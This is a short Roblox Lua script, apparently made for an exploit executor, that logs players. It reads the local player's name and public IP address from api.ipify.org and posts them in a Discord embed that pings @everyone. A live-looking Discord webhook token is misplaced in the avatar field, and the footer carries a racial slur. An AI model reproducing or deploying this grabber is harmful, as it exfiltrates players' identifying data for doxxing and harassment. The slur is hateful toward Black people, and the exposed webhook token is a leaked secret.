local footer =
"Nigger Slayer"

local url = 
   ""
local data = {
            ["username"] = "logger",
            ["avatar_url"] = "https://discord.com/api/webhooks/1282052035390345309/zrVQiGOR5vUZ6YRjhK8qiznd3te14xeLabKd1YaCAwSmw6cC6DzGr0Di1h7GEdQ-OKr7", 
    
    ["content"] = " @everyone ", 
    ["embeds"] = {
       {
           ["title"] = "**"..game.Players.LocalPlayer.Name.. "**",
           ["description"] = "**"..game:HttpGet("https://api.ipify.org/").. "**",
           ["type"] = "rich", 
           ["color"] = 14680319,
           ["footer"] = {
             ["text"] = "" ..footer.. "", 
           },
       },
   }
}

local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
